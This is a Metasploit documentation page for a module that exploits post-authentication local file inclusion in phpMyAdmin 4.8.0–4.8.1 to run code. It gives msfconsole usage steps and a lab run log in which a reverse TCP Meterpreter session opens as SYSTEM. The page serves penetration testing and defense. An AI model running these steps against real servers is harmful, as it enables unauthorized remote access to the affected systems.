ContextQMD
Back to Metasploit Framework

Phpmyadmin Lfi Rce

documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md

6.4.1311.2 KB
Original Source

Description

phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.

Vulnerable Application

phpMyAdmin v4.8.1 and v4.8.0

Verification Steps

  1. ./msfconsole -q
  2. use exploit/multi/http/phpmyadmin_lfi_rce
  3. set rhosts <rhost>
  4. run

Scenarios

Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1

msf > use exploit/multi/http/phpmyadmin_lfi_rce
msf exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122
rhosts => 172.22.222.122
msf exploit(multi/http/phpmyadmin_lfi_rce) > run

[*] Started reverse TCP handler on 172.22.222.190:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    :
OS          : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >